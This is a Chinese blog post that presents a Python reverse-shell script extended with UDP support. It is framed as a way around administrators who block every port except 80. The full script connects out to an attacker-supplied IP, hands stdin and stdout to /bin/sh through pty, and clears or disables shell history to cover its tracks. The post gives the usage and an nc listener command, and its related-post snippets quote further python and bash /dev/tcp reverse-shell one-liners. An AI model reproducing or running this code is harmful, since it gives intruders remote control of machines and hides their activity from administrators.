python反弹shell_python 反弹shell,加了UDP

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量152 收藏
点赞数
文章标签: python反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30953203/article/details/114420380
版权

用来对付一些把除了80端口都封了的变态网管

用法 back.py 123.123.123.123 53 udp

nc监听:

nc -l 53 -u

后面不加udp的话还是默认的tcp

因为udp没有sequence的特性,当数据超过1个数据包的大小时会错位,具体多大会分包不太清楚,我记得是1500字节?好像和MTU有关。命令不要打太长就行了(一般情况下好像基本不会有1500个字符的命令)

其实就加了4行……

# -*- coding:utf-8 -*-

#!/usr/bin/env python

"""

back connect py version,only linux have pty module

code by google security team

UDP by anthrax@insight-labs.org

"""

import sys,os,socket,pty

shell = "/bin/sh"

def usage(name):

print 'python reverse connector'

print 'usage: %s [udp]' % name

def main():

if len(sys.argv) <3:

usage(sys.argv[0])

sys.exit()

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

if sys.argv[3]=='udp':

s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

except:pass

try:

s.connect((sys.argv[1],int(sys.argv[2])))

print 'connect ok'

except:

print 'connect faild'

sys.exit()

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

global shell

os.unsetenv("HISTFILE")

os.unsetenv("HISTFILESIZE")

os.unsetenv("HISTSIZE")

os.unsetenv("HISTORY")

os.unsetenv("HISTSAVE")

os.unsetenv("HISTZONE")

os.unsetenv("HISTLOG")

os.unsetenv("HISTCMD")

os.putenv("HISTFILE",'/dev/null')

os.putenv("HISTSIZE",'0')

os.putenv("HISTFILESIZE",'0')

pty.spawn(shell)

s.close()

if __name__ == '__main__':

main()

欣睿(兰静)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ 隧道技术 ] 反弹shell的集中常见方式(四)python反弹shell
qq_51577576的博客
09-06 1319
python反弹shell python2 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.192.1',55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
python小球反弹_以Python写的 反弹工具
weixin_39999222的博客
12-23 791
python 反弹shell我们知道,一般的反弹shell可以直接使用 base 反弹bash -i >& /dev/tcp/ownip/port 0>&1还可以使用一些简单的命令 nc nmap 等等。。。。nc -l -p port -vv xxx经过前几次的攻击,他也变聪明了,知道我针对了php 的文件强了管控,所以它又有针对性的使用了Linux自带的...
python反弹shell_反弹shell的各种姿势
weixin_39890543的博客
01-15 3837
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。Linux 反弹shell姿势一:bash反弹bash -i >& /dev...
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4325
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 2040
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
python 反弹shellUDP
weixin_34349320的博客
03-20 228
2019独角兽企业重金招聘Python工程师标准>>> ...
反弹shell初识
无痕的博客
11-01 4038
反弹shell的指令与演示
反弹shell_DC-3_wp
CHUNJIUJUN的博客
08-20 669
反弹shell原理与实现 (转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com)) 什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我
反弹shell(未完待续)
weixin_52116519的博客
10-22 824
反弹shell亲手去测试总会遇到各种问题,这个问题也可能是玄学问题,那就重启咯。找解决方法时要注意上系统及其版本,比如docker的安装在Ubuntu不同版本是不太一样的。为了防止入门劝退,最好找个跟自己一样系统版本的解决教程。先动手按照教程去实验一遍,不懂原理可以稍后去了解,不要因为不会就永远停在一个地方。最近看到的两句话(1)学习的本质是模仿。不会走先学爬,照葫芦画瓢,慢慢积累实战经验。(2)掌握一门学科所用的时间越短,学习质量就越高,对知识的理解也越深。
反弹shell汇总(超详细)
qq_52173020的博客
05-27 7611
反弹shell姿势大全,看这一篇就够啦~
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文).zip
08-05
[毕业设计]VB环境下电脑销售与财务管理系统开发(ACCESS+源代码+论文)
PPO(Proximal Policy Optimization,近端策略优化)算法
08-05
在解答2024年华数杯全国大学生数学建模竞赛的C题“老外游中国”时,虽然PPO(Proximal Policy Optimization,近端策略优化)算法主要是应用于强化学习领域,特别是在解决连续动作空间的策略优化问题上,但在此数学建模竞赛中,它并不直接适用于数据处理、综合评价或路径规划等任务。不过,我们可以从数据处理和决策优化的角度,类比强化学习中的一些思想来构思解题策略。 然而,对于本题而言,我们可以更侧重于数据分析、综合评价模型(如层次分析法AHP、TOPSIS、模糊综合评价等)和路径规划算法(如Dijkstra、A*、遗传算法等)来解决问题。以下是对各个问题的进一步建模思路: 一、问题1建模思路 1.1 数据处理与分析 数据收集与清洗:首先,需要载所有352个城市的CSV文件,对每个城市的100个景点信息进行数据清洗,去除无效或缺失的关键信息(如评分缺失的景点)。 最高分查找:遍历所有景点,找到最高评分(BS),并统计获评该评分的景点数量。 城市排名:统计每个城市获评BS的景点数量,并根据数量多少进行排序,列出前10个城市。 二、问题2建模思路 2.1 综合评价体系构建
中国城市统计年鉴(1985-2023)
08-05
《中国城市统计年鉴》是全面反映中国城市社会经济发展情况的资料性年刊。《中国城市统计年鉴—2023》收录了2022年全国各级城市社会经济发展等方面的主要统计数据。 本年鉴内容共分四个部分: 第一部分是全国城市行政区划,列有不同区域、不同级别的城市分布情况; 第二、三部分分别是地级以上城市统计资料和县级城市统计资料,具体包括人口、资源环境、经济发展、科技创新、人民生活、公共服务、等方面的数据; 第四部分是附录,为主要统计指标解释。 需要说明的是,从1997年开始,地级以上城市和县级城市分别采用不同的统计制度,有些指标在两类城市之间不具有可比性,故本年鉴将地级以上城市和县级城市统计资料分为独立的两部分。本年鉴所涉及的全国或全部城市统计资料,均未包括香港特别行政区、澳门特别行政区和台湾省。
振中TP900 驱动工具2.2
08-05
振中TP900 驱动工具2.2
大学信息安全试题精选12
08-05
大学信息安全试题精选 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
mutiple_pie (8).zip
08-05
mutiple_pie (8).zip
基于pytorch实现的ResUnet对BRATS脑肿瘤多模态分割项目(数据集、源码、训练结果)
最新发布
08-06
基于pytorch实现的ResUnet对BRATS脑肿瘤多模态分割项目(数据集、源码、训练结果) 本项目对BRATS脑肿瘤的四种模态FLAIR、T1w、t1gd、T2w进行融合分割 实现思路,将四种模态进行融合,并且将原始的nii.gz数据转换成npy数据。然后将四种模态的npy数据输入resUnet网络,总共训练了30个epoch,训练集的iou达到了0.84左右 如果想更换数据集进行多模态的训练,更换数据集按照readme文件操作即可
[毕业设计]JAVA大文件分块传输与合并机制(源代码+论文).zip
08-05
[毕业设计]JAVA大文件分块传输与合并机制(源代码+论文)
销售总数据统计表.xlsx
08-05
销售管理表,财务报表,占比分析,消费能力分析,日程安排,提成表,考核表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值